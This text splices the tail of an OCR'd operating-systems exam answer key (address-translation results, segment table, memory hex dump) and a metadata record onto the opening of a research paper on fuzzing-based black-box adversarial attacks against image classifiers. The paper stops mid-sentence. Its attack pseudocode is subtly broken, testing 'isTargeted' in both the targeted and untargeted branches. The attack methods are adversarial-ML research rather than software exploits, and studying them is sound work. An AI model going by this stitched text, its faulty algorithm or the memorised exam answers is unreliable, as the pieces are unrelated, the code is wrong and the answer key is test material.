The return value for a load is an 8-bit data value or an error, while the return value for a store is either “ok” or an error. If there is an error, say which error. Possibilities are: “bad segment” (invalid segment), “segment overflow” (address outside segment), or “access violation” (page invalid/attempt to write a read only page). A few answers are given:
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Translated Physical Address</th>
<th>Result (return value)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Load [0x30115]</td>
<td>0x3115</td>
<td>0x57</td>
</tr>
<tr>
<td>Store [0x10345]</td>
<td>0x3145</td>
<td>Access violation</td>
</tr>
<tr>
<td>Store [0x30316]</td>
<td>0xF016</td>
<td>ok</td>
</tr>
<tr>
<td>Load [0x01202]</td>
<td>0xF002</td>
<td>0x22</td>
</tr>
<tr>
<td>Store [0x31231]</td>
<td>0xE031</td>
<td>Access violation</td>
</tr>
<tr>
<td>Store [0x21202]</td>
<td>N/A</td>
<td>Bad segment</td>
</tr>
<tr>
<td>Load [0x11213]</td>
<td>N/A</td>
<td>Segment overflow</td>
</tr>
<tr>
<td>Load [0x01515]</td>
<td>0x3015 or N/A</td>
<td>Access violation</td>
</tr>
</tbody>
</table>
### Segment Table (Segment limit = 3)
<table>
<thead>
<tr>
<th>Seg #</th>
<th>Page Table Base</th>
<th>Max Pages in Segment</th>
<th>Segment State</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0x2030</td>
<td>0x20</td>
<td>Valid</td>
</tr>
<tr>
<td>1</td>
<td>0x1020</td>
<td>0x10</td>
<td>Valid</td>
</tr>
<tr>
<td>2</td>
<td>0xF040</td>
<td>0x40</td>
<td>Invalid</td>
</tr>
<tr>
<td>3</td>
<td>0x4000</td>
<td>0x20</td>
<td>Valid</td>
</tr>
</tbody>
</table>
### Physical Memory
<table>
<thead>
<tr>
<th>Address</th>
<th>+0</th>
<th>+1</th>
<th>+2</th>
<th>+3</th>
<th>+4</th>
<th>+5</th>
<th>+6</th>
<th>+7</th>
<th>+8</th>
<th>+9</th>
<th>+A</th>
<th>+B</th>
<th>+C</th>
<th>+D</th>
<th>+E</th>
<th>+F</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0000</td>
<td>0E</td>
<td>0F</td>
<td>10</td>
<td>11</td>
<td>12</td>
<td>13</td>
<td>14</td>
<td>15</td>
<td>16</td>
<td>17</td>
<td>18</td>
<td>19</td>
<td>1A</td>
<td>1B</td>
<td>1C</td>
<td>1D</td>
</tr>
<tr>
<td>0x0010</td>
<td>1E</td>
<td>1F</td>
<td>20</td>
<td>21</td>
<td>22</td>
<td>23</td>
<td>24</td>
<td>25</td>
<td>26</td>
<td>27</td>
<td>28</td>
<td>29</td>
<td>2A</td>
<td>2B</td>
<td>2C</td>
<td>2D</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x1010</td>
<td>40</td>
<td>41</td>
<td>42</td>
<td>43</td>
<td>44</td>
<td>45</td>
<td>46</td>
<td>47</td>
<td>48</td>
<td>49</td>
<td>4A</td>
<td>4B</td>
<td>4C</td>
<td>4D</td>
<td>4E</td>
<td>4F</td>
</tr>
<tr>
<td>0x1020</td>
<td>40</td>
<td>03</td>
<td>41</td>
<td>01</td>
<td>30</td>
<td>01</td>
<td>31</td>
<td>01</td>
<td>00</td>
<td>03</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>0x1030</td>
<td>00</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
</tr>
<tr>
<td>0x1040</td>
<td>10</td>
<td>01</td>
<td>11</td>
<td>03</td>
<td>31</td>
<td>03</td>
<td>13</td>
<td>00</td>
<td>14</td>
<td>01</td>
<td>15</td>
<td>03</td>
<td>16</td>
<td>01</td>
<td>17</td>
<td>00</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x2030</td>
<td>10</td>
<td>01</td>
<td>11</td>
<td>00</td>
<td>12</td>
<td>03</td>
<td>67</td>
<td>03</td>
<td>11</td>
<td>03</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>0x2040</td>
<td>02</td>
<td>20</td>
<td>03</td>
<td>30</td>
<td>04</td>
<td>40</td>
<td>05</td>
<td>50</td>
<td>01</td>
<td>60</td>
<td>03</td>
<td>70</td>
<td>08</td>
<td>80</td>
<td>09</td>
<td>90</td>
</tr>
<tr>
<td>0x2050</td>
<td>10</td>
<td>00</td>
<td>31</td>
<td>01</td>
<td>F0</td>
<td>03</td>
<td>F0</td>
<td>01</td>
<td>12</td>
<td>03</td>
<td>30</td>
<td>00</td>
<td>10</td>
<td>00</td>
<td>10</td>
<td>01</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x3100</td>
<td>01</td>
<td>12</td>
<td>23</td>
<td>34</td>
<td>45</td>
<td>56</td>
<td>67</td>
<td>78</td>
<td>89</td>
<td>9A</td>
<td>AB</td>
<td>BC</td>
<td>CD</td>
<td>DE</td>
<td>EF</td>
<td>00</td>
</tr>
<tr>
<td>0x3110</td>
<td>02</td>
<td>13</td>
<td>24</td>
<td>35</td>
<td>46</td>
<td>57</td>
<td>68</td>
<td>79</td>
<td>8A</td>
<td>9B</td>
<td>AC</td>
<td>BD</td>
<td>CE</td>
<td>DF</td>
<td>F0</td>
<td>01</td>
</tr>
<tr>
<td>0x3120</td>
<td>03</td>
<td>01</td>
<td>25</td>
<td>36</td>
<td>47</td>
<td>58</td>
<td>69</td>
<td>7A</td>
<td>8B</td>
<td>9C</td>
<td>AD</td>
<td>BE</td>
<td>CF</td>
<td>E0</td>
<td>F1</td>
<td>02</td>
</tr>
<tr>
<td>0x3130</td>
<td>04</td>
<td>15</td>
<td>26</td>
<td>37</td>
<td>48</td>
<td>59</td>
<td>70</td>
<td>7B</td>
<td>8C</td>
<td>9D</td>
<td>AE</td>
<td>BF</td>
<td>D0</td>
<td>E1</td>
<td>F2</td>
<td>03</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x4000</td>
<td>30</td>
<td>00</td>
<td>31</td>
<td>01</td>
<td>11</td>
<td>01</td>
<td>F0</td>
<td>03</td>
<td>34</td>
<td>01</td>
<td>35</td>
<td>00</td>
<td>43</td>
<td>38</td>
<td>32</td>
<td>79</td>
</tr>
<tr>
<td>0x4010</td>
<td>50</td>
<td>28</td>
<td>84</td>
<td>19</td>
<td>71</td>
<td>69</td>
<td>39</td>
<td>93</td>
<td>75</td>
<td>10</td>
<td>58</td>
<td>20</td>
<td>97</td>
<td>49</td>
<td>44</td>
<td>59</td>
</tr>
<tr>
<td>0x4020</td>
<td>23</td>
<td>03</td>
<td>20</td>
<td>03</td>
<td>E0</td>
<td>01</td>
<td>E1</td>
<td>08</td>
<td>E2</td>
<td>86</td>
<td>28</td>
<td>03</td>
<td>48</td>
<td>25</td>
<td>34</td>
<td>21</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0xE000</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
</tr>
<tr>
<td>0xE010</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0xF000</td>
<td>00</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
</tr>
<tr>
<td>0xF010</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
<td>00</td>
</tr>
<tr>
<td>0xF020</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
<td>00</td>
<td>11</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
</tbody>
</table>
[ This page left for scratch ]
|
{"Source-Url": "https://cs162.org/static/exams/fa15-mt1-solutions.pdf", "len_cl100k_base": 11601, "olmocr-version": "0.1.50", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 41737, "total-output-tokens": 10918, "length": "2e13", "weborganizer": {"__label__adult": 0.0005946159362792969, "__label__art_design": 0.0006074905395507812, "__label__crime_law": 0.00045013427734375, "__label__education_jobs": 0.0195465087890625, "__label__entertainment": 0.00018262863159179688, "__label__fashion_beauty": 0.00026679039001464844, "__label__finance_business": 0.0004379749298095703, "__label__food_dining": 0.0006885528564453125, "__label__games": 0.0018949508666992188, "__label__hardware": 0.00505828857421875, "__label__health": 0.0006670951843261719, "__label__history": 0.0006346702575683594, "__label__home_hobbies": 0.00030303001403808594, "__label__industrial": 0.0010547637939453125, "__label__literature": 0.000762939453125, "__label__politics": 0.0004405975341796875, "__label__religion": 0.0008211135864257812, "__label__science_tech": 0.08673095703125, "__label__social_life": 0.00027489662170410156, "__label__software": 0.0110931396484375, "__label__software_dev": 0.86572265625, "__label__sports_fitness": 0.0004732608795166016, "__label__transportation": 0.0010728836059570312, "__label__travel": 0.0003039836883544922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33986, 0.05146]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33986, 0.18656]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33986, 0.84774]], "google_gemma-3-12b-it_contains_pii": [[0, 891, false], [891, 954, null], [954, 3100, null], [3100, 4452, null], [4452, 6690, null], [6690, 8828, null], [8828, 10670, null], [10670, 12400, null], [12400, 14029, null], [14029, 16142, null], [16142, 17558, null], [17558, 20170, null], [20170, 22243, null], [22243, 23611, null], [23611, 25108, null], [25108, 25108, null], [25108, 28422, null], [28422, 30713, null], [30713, 33956, null], [33956, 33956, null], [33956, 33986, null]], "google_gemma-3-12b-it_is_public_document": [[0, 891, true], [891, 954, null], [954, 3100, null], [3100, 4452, null], [4452, 6690, null], [6690, 8828, null], [8828, 10670, null], [10670, 12400, null], [12400, 14029, null], [14029, 16142, null], [16142, 17558, null], [17558, 20170, null], [20170, 22243, null], [22243, 23611, null], [23611, 25108, null], [25108, 25108, null], [25108, 28422, null], [28422, 30713, null], [30713, 33956, null], [33956, 33956, null], [33956, 33986, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, true], [5000, 33986, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33986, null]], "pdf_page_numbers": [[0, 891, 1], [891, 954, 2], [954, 3100, 3], [3100, 4452, 4], [4452, 6690, 5], [6690, 8828, 6], [8828, 10670, 7], [10670, 12400, 8], [12400, 14029, 9], [14029, 16142, 10], [16142, 17558, 11], [17558, 20170, 12], [20170, 22243, 13], [22243, 23611, 14], [23611, 25108, 15], [25108, 25108, 16], [25108, 28422, 17], [28422, 30713, 18], [30713, 33956, 19], [33956, 33956, 20], [33956, 33986, 21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33986, 0.25238]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
432360970134bd1aa114cd36422c184b1e83ba55
|
FUZZING-BASED HARD-LABEL BLACK-BOX ATTACKS AGAINST MACHINE LEARNING MODELS
Anonymous authors
Paper under double-blind review
ABSTRACT
Machine learning models are known to be vulnerable to adversarial examples. Based on different levels of knowledge that attackers have about the models, adversarial example generation methods can be categorized into white-box and black-box attacks. We study the most realistic attacks, hard-label black-box attacks, where attackers only have the query access of a model and only the final predicted labels are available. The main limitation of the existing hard-label black-box attacks is that they need a large number of model queries, making them inefficient and even infeasible in practice. Inspired by the very successful fuzz testing approach in traditional software testing and computer security domains, we propose fuzzing-based hard-label black-box attacks against machine learning models. We design an AdvFuzzer to explore multiple paths between a source image and a guidance image, and design a LocalFuzzer to explore the nearby space around a given input for identifying potential adversarial examples. We demonstrate that our fuzzing attacks are feasible and effective in generating successful adversarial examples with significantly reduced number of model queries and $L_0$ distance. More interestingly, supplied with a successful adversarial example as a seed, LocalFuzzer can immediately generate more successful adversarial examples even with smaller $L_2$ distance from the source example, indicating that LocalFuzzer itself can be an independent and useful tool to augment many adversarial example generation algorithms.
1 INTRODUCTION
Machine learning models, especially deep neural networks, are demonstrated as being vulnerable to adversarial examples (Biggio et al., 2013; Szegedy et al., 2014). Adversarial examples are generated by adding small perturbations to clean inputs to fool machine learning models to misclassify. In image classification tasks, adversarial examples can be found by many attack methods (Goodfellow et al., 2015; Papernot et al., 2016b; Kurakin et al., 2017; Carlini & Wagner, 2017) with the knowledge of a neural network architecture and its parameters. This type of attacks is considered as white-box attacks. While research on white-box attacks significantly helps the community to better understand adversarial examples and deep neural networks, white-box attacks are only applicable to limited real-world scenarios such as on publicly available models or exposed confidential models.
In many real-world scenarios, black-box attacks are more realistic, where an attacker only has the query access to a model. Some recent attacks (Narodytska & Kasiviswanathan, 2017; Chen et al., 2017; Hayes & Danezis, 2018; Ilyas et al., 2018) rely on probability vectors (e.g., predicted scores or logits) of a model to generate adversarial examples, and they are referred to as soft-label black-box attacks. However, in many more realistic scenarios, only the final predicted labels (e.g., the top-1 class label) of a model are available to the attackers. This category of attacks is referred to as hard-label black-box attacks. Three recent attack methods including Boundary attack (Brendel et al., 2017), Label-only attack (Ilyas et al., 2018), and Opt attack (Cheng et al., 2019) fall into this category. However, although they can generate adversarial examples with comparable perturbations to white-box attacks, the main limitation of existing hard-label black-box attacks is that they need a large number of model queries since model information is not available.
From a unique perspective, we propose fuzzing-based hard-label black-box attacks by leveraging the fuzzing approach that is very successful in software testing and computer security domains (My-
The generation of adversarial examples can be essentially considered as an optimization problem. In order to find an optimal adversarial example around a clean input, attack algorithms need information such as gradient of the loss function, vectors of classification probability, or hard labels from a model as guidance to walk toward the goal. The adversarial examples then cause the model to misclassify. Interestingly, we consider the following analogy: a machine learning model to be attacked is similar to a target program to be tested for correctness or security bugs. Adversarial examples that cause a model to misclassify are analogous to inputs that trigger a target program to crash. These similarities and the huge success of the fuzzing approach in those traditional domains inspire us to leverage an originally black-box software testing technique, *fuzz testing*, for exploring black-box adversarial example attacks in the adversarial machine learning domain.
The word “fuzz” was first proposed by Miller et al. [1990] to represent random, unexpected, and unstructured data (Takanen et al., 2008). Fuzz testing aims to find program failures by iteratively and randomly generating inputs to test a target program (Klees et al., 2018). It is a very effective approach to identifying correctness or security bugs in traditional software systems (Haller et al., 2013; Appelt et al., 2014; Jeong et al., 2019) as well as development or deployment bugs in machine learning models (Odena et al., 2019; Xie et al., 2018).
In this paper, we propose fuzzing-based attacks against machine learning models in hard-label black-box settings. We take the fuzz testing approach to generate random inputs for exploring the adversarial example space. We design two fuzzers: an adversarial fuzzer (referred to as AdvFuzzer) and a local fuzzer (referred to as LocalFuzzer). AdvFuzzer explores multiple paths from a clean example to a guidance example. LocalFuzzer explores the nearby space around a given input. Our approach can be applied in both targeted and untargeted settings, aiming to generate adversarial examples using a much smaller number of model queries than existing hard-label black-box attacks. Note that when a successful adversarial example is supplied as the input, LocalFuzzer has the potential to generate a large number of other successful adversarial examples in bulk. This bulk generation can be applied to adversarial examples generated from any attack methods, and potentially refine their “optimized” adversarial examples by reducing the $L_2$ distance from the source example.
We perform experiments to attack deep neural networks for MNIST and CIFAR-10 datasets to evaluate our fuzzing approach. The experimental results show that our fuzzing attacks are feasible, efficient, and effective. For example, the number of model queries can be reduced by 10-18 folds for MNIST and 2-5 folds for CIFAR-10 in untargeted attacks in comparison between ours and existing hard-label black-box methods. We also evaluate our LocalFuzzer on successful examples generated by Boundary attack, Opt attack, and our fuzzing attacks to validate its usefulness. For example, we achieve 100% success bulk generation rate and 48%-100% success bulk generation rate with lower $L_2$ for MNIST adversarial examples generated by different methods in untargeted attacks. Our work provides evidence on the feasibility and benefits of fuzzing-based attacks. To the best of our knowledge, this is the first work on exploring fuzz testing in adversarial example attacks.
## 2 Background and Related Work
**Adversarial Examples** In this paper, we consider computer vision classification tasks, in which a DNN model $f$ aims to classify an input image $x$ to a class $y$. We define a clean input image $x$ as *source example* with source class $y$. The attack goal is to generate an adversarial example $x'$ close to source example $x$ such that: (1) $x'$ is misclassified as any class other than the source class $y$ in the *untargeted attack* setting, or (2) $x'$ is misclassified as a specific class $y' != y$ in the *targeted attack* setting. We consider that an adversary has the hard-label black-box capability which means the adversary only has the query access to the model $f$ and only final label outputs are available.
**White-box attacks** Most existing attacks rely on full access to the model architecture and parameters. Example attack algorithms include Fast Gradient Sign Method (Goodfellow et al., 2015), Jacobian-based Saliency Map Approach (Papernot et al., 2016b), Basic Iterative Method (Kurakin et al., 2017), L-BFGS (Szegedy et al., 2014), Carlini & Wagner attack (Carlini & Wagner, 2017), etc. White-box attacks need gradient information of the loss function as guidance to find adversarial examples. However, the white-box scenarios are not very realistic considering the fact that many real-world machine learning models are confidential. Besides, white-box attacks can only be applied to differentiable model architectures like DNNs not to tree-based models.
Black-box attacks In many real-world scenarios, black-box attacks are more realistic where attackers only have the query access to the model and do not have detailed model information. One type of black-box attacks is transferability-based (Papernot et al., 2017), where an adversary trains a substitute model with a substitute dataset and then generates adversarial examples from the substitute model using white-box attacks. Because of the transferability (Szegedy et al., 2014; Goodfellow et al., 2015; Papernot et al., 2016a), adversarial examples generated from the substitute model can potentially fool the targeted model, even if the two models have different architectures. One limitation of this approach is that it needs information about training data. Besides, attacking the substitute model leads to larger perturbation and lower success rate (Chen et al., 2017; Papernot et al., 2016a, 2017).
Soft-label black-box attacks (Chen et al., 2017; Narodytska & Kasiviswanathan, 2017; Ilyas et al., 2018) rely on classification probability to generate adversarial examples. Since the classification probability vectors are usually inaccessible, hard-label black-box attacks are considered as more realistic, where only the final predicted labels are available to the attackers. Boundary attack (Brendel et al., 2017) is based on a random walk around the decision boundary using examples drawn from a proposal distribution. Label-only attack (Ilyas et al., 2018) uses discretized score, image robustness of random perturbation, and Monte Carlo approximation to find a proxy for the output probability and then uses an NES gradient estimator to generate adversarial examples in a similar way as soft-label black-box attacks. Opt attack (Cheng et al., 2019) reformulates the problem as a continuous real-valued optimization problem which can be solved by any zeroth-order optimization algorithm. The main limitation of these existing hard-label black-box attacks is that they need a large number of model queries, in part because they follow the traditional (approximated) optimization approach and they all aim to walk closer to a clean example starting from a point that is already adversarial. This limitation makes them inefficient and even infeasible in practice when the allowed number of queries is limited by a model. In contrast, our fuzzing-based hard-label black-box attacks start from a clean example and walk away from it step by step. With careful guidance and leveraging the randomness advantage of the fuzz testing approach, our attacks have the potential to use a much smaller number of queries to generate a successful adversarial example.
3 Approach and Algorithms
3.1 Overview of our Approach
Fuzz testing was first proposed by Miller et al. (1990). The key idea is to use random, unexpected, and unstructured data to find program failures. In recent years, fuzzers such as AFL (Zalewski 2007) and libFuzzer (Serebryany 2016) have gained great popularity because of their effectiveness and scalability. A typical fuzzer works by iteratively (1) selecting a seed input from a pool, (2) mutating the chosen seed to generate new inputs, (3) evaluating the newly generated inputs, and (4) recording observations such as program crashes and adding useful inputs into the seed pool. Our fuzzing-based hard-label black-box attacks leverage the basic idea of fuzz testing to explore the adversarial example space.
Figure 1 depicts the basic intuition of our attacks. We design two fuzzers: an adversarial fuzzer (referred to as AdvFuzzer) and a local fuzzer (referred to as LocalFuzzer). Starting from a source image which is clean, AdvFuzzer slowly (thus with less amount of perturbations) walks away from it step by step by randomly selecting a path toward a guidance image. With multiple runs, AdvFuzzer will explore multiple random paths aiming to explore different regions of the adversarial example space between the two images. The guidance image could be a clean image of a specific target class for performing targeted attacks, or any image not of the source (image) class for performing untargeted attacks. LocalFuzzer aims to explore the nearby
data points for identifying potential adversarial examples around the current image as AdvFuzzer takes the main steps.
It is important to point out that AdvFuzzer walks from a source image to a guidance image, thus taking a reverse direction from what is taken in existing hard-label black-box attacks including Boundary attack (Brendel et al., 2017), Label-only attack (Ilyas et al., 2018), and Opt attack (Cheng et al., 2019). Combining this strategy with the randomness advantage of the fuzz testing approach, our attacks have the potential to use a much smaller number of queries to more efficiently or practically generate successful adversarial examples. Moreover, LocalFuzzer can indeed be applied to any attack methods including black-box and white-box ones. When LocalFuzzer is supplied with a successful adversarial example as a seed, it can efficiently generate new successful adversarial examples in bulk and among which further optimized (e.g., in terms of reducing the $L_2$ distance from the source image) ones could even be identified.
3.2 ALGORITHMS
AdvFuzzer The logic for AdvFuzzer is presented in Algorithm 1. It generates an adversarial example $img_{adv}$ as output, and takes a target model $f$, $isTargeted$ parameter, a source image $img_s$, a guidance image $img_g$, and attack guidance strategy $k$ as inputs. For every iteration of the while loop, a random main step is taken by selecting a perturbation $\epsilon$ based on the attack guidance strategy $k$ (Line 4). We adopt a $L_0$ strategy which changes a random pixel in the perturbation $\epsilon$ image to the corresponding difference pixel value between the guidance image and the current image. Note that other strategies based on $L_\infty$ and $L_2$ could also be applied but we found $L_0$ strategy is the most effective. If the current image reaches the attack goal, a medium level LocalFuzzer is applied to explore the nearby space for potentially generating more successful adversarial examples. Otherwise, a small level LocalFuzzer is used to check if some successful adversarial examples could still be found nearby. The while loop ends whenever a successful example is found or the number of steps reaches the maximum number of steps which is the $L_0$ distance between the source image and the guidance image. It will then fine tune a random successful adversarial example in the adversarial example set $S_{adv}$ by using a walk_back fuzzer. The walk_back fuzzer works in a similar manner as LocalFuzzer as described below.
Algorithm 1 AdvFuzzer: generating an adversarial example using fuzzing
Input: $f$: a black-box model,
$\text{isTargeted}$: True for targeted attack and False for untargeted attack,
$\text{img}_s$: a source image with class $s$, i.e., $f(\text{img}_s) = s$,
$\text{img}_g$: a guidance image with $f(\text{img}_g) = t$ for targeted attack
or $f(\text{img}_g)! = s$ for untargeted attack,
$k$: attack guidance, e.g., based on $L_0$ or $L_\infty$ distance.
Output: $\text{img}_{adv}$: an adversarial example from a successful adversarial examples set $S_{adv}$.
1: $S_{adv} \leftarrow \emptyset$
2: $\text{img}_{cur} \leftarrow \text{img}_s$
3: while $\text{size}(S_{adv}) == 0$ and $\text{num} \_\text{steps} < \text{MAX} \_\text{STEPS}$ do
4: $\epsilon = \text{SelectPerturbationAlongMainDirection}(\text{img}_{cur}, \text{img}_g, k)$
5: $\text{img}_{cur} = \text{img}_{cur} + \epsilon$
6: if ($\text{isTargeted}$ and $f(\text{img}_{cur}) == t$) or ($\text{isTargeted}$ and $f(\text{img}_{cur}) != s$) then
7: $S_{adv} = S_{adv} \cup \text{LocalFuzzer}(f, \text{img}_{cur}, s, t, \text{isTargeted}, \text{medium} \_\text{level})$
8: else
9: $S_{adv} = S_{adv} \cup \text{LocalFuzzer}(f, \text{img}_{cur}, s, t, \text{isTargeted}, \text{small} \_\text{level})$
10: $\text{num} \_\text{steps} += 1$
11: $\text{img}_{adv} = \text{walk} \_\text{back}(f, \text{img}_s, S_{adv}[0], s, t, \text{medium} \_\text{level}, \text{isTargeted})$
12: return $\text{img}_{adv}$
LocalFuzzer LocalFuzzer is described in Algorithm 2. Its goal is to generate a set of adversarial examples potentially around an input image $\text{img}$. An adversarial example set $S_{adv}$ and a set $S_{all}$ including all examples are maintained as seed pools. A candidate seed is randomly selected and then mutated. For an input image, fuzzer_level controls the total number of mutated images to
be generated. In each iteration, a random perturbation based mutation is applied. The mutation function randomly selects one pixel of an image and changes its value to any real number between 0 and 1. The mutated image is then added to the adversarial set $S_{adv}$ if it meets the attack goal. The loop stops once the fuzzer level is reached and the adversarial image set $S_{adv}$ (could be empty) is returned. The difference between a LocalFuzzer and a walk back fuzzer is the mutation. Instead of changing one random pixel to a random value between 0 and 1, the walk back fuzzer mutates an image by randomly changing some pixel values of a current image closer or directly to that of the source image.
\begin{algorithm}
\caption{LocalFuzzer: generating a set of adversarial examples using fuzzing locally}
\begin{algorithmic}[1]
\Input \textit{f}: a black-box model,
\hspace{1em} \textit{img}: an input image,
\hspace{1em} \textit{s}: source image class,
\hspace{1em} \textit{t}: target class,
\hspace{1em} \textit{isTargeted}: True for targeted attack and False for untargeted attack,
\hspace{1em} \textit{fuzzer level}: level of local fuzzing.
\Output $S_{adv}$: a set of successful adversarial examples.
1: $S_{adv} \leftarrow \emptyset$
2: $S_{all} \leftarrow \{\textit{img}\}$
3: if (\textit{isTargeted} and $f(\textit{img}) == t$) or (\textit{isTargeted} and $f(\textit{img}) != s$) then
4: $S_{adv} = S_{adv} \cup \{\textit{img}\}$
5: for $i$ from 1 to \textit{fuzzer level} do
6: \textbf{if} $S_{adv} != \emptyset$ then
7: $\textit{img}_{rand} = \text{RandomSelect}(S_{adv})$
8: \textbf{else}
9: $\textit{img}_{rand} = \text{RandomSelect}(S_{all})$
10: $\textit{img}_{mut} = \text{mutation}(\textit{img}_{rand})$
11: if (\textit{isTargeted} and $f(\textit{img}_{mut}) == t$) or (\textit{isTargeted} and $f(\textit{img}_{mut}) != s$) then
12: $S_{adv} = S_{adv} \cup \{\textit{img}_{mut}\}$
13: $S_{all} = S_{all} \cup \{\textit{img}_{mut}\}$
14: \textbf{return} $S_{adv}$
\end{algorithmic}
\end{algorithm}
4 Experimental Results
We now evaluate the feasibility and effectiveness of our fuzzing attacks. We use two standard datasets: MNIST [LeCun & Cortes, 2010] and CIFAR-10 [Krizhevsky, 2009]. We compare fuzzing attacks with four attacks including Boundary attack [Brendel et al., 2017], Opt attack [Cheng et al., 2019], and C&W $L_0$ and $L_2$ attacks [Carlini & Wagner, 2017]. Note that C&W attacks are white-box attacks. All the experiments are performed for both targeted attacks and untargeted attacks. Label-only attack [Ilyas et al., 2018] was evaluated by the authors only on ImageNet and we could not find its code for MNIST and CIFAR-10, so we did not include it in our evaluation.
To have a fair comparison, we adopt the same network architecture for MNIST and CIFAR-10 used in [Carlini & Wagner, 2017]. Note that [Brendel et al., 2017] also used the same network architecture, which has two convolution layers followed by a max-pooling layer, two convolution layers, a max-pooling layer, two fully-connected layers, and a softmax layer. Using the same parameters as reported in [Carlini & Wagner, 2017], we obtained 99.49% and 82.71% test accuracy for MNIST and CIFAR-10, respectively.
4.1 Overall Results
From the test set of each dataset, we randomly selected 10 images for each of the 10 classes. These same 100 images are used as source examples for all attacks. We use white-box C&W $L_0$ and $L_2$
